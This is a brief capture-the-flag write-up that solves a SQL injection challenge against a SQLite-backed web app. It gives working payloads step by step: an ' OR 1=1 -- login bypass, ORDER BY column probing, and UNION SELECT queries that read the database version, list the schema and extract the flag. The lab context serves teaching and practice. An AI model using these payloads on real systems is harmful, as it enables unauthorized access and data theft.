Skip to content

More SQLi

Solution of prev problem doesn't work here..

Log in using: \ Username: anything \ Password: ' OR 1=1 --

On successful login, we get a page with input box, which is a parameter for an SQL query whose result is displayed as on the page.

Find the no. of columns being returned by submitting inputs:

algiers' ORDER BY 1 --
algiers' ORDER BY 2 --
algiers' ORDER BY 3 --
algiers' ORDER BY 4 --

No. of columns is 3. Find the sql engine being used by trying out version queries. Query for SQLLite is successful.

algiers' UNION SELECT sqlite_version(), NULL, NULL --

Print all the tables and columns:

algiers' UNION SELECT m.name as tbl, p.name as col, NULL FROM sqlite_master m left outer join pragma_table_info((m.name)) p on m.name <> p.name order by tbl, col --

Notice a flag column, display it:

algiers' UNION SELECT flag,NULL,NULL FROM more_table --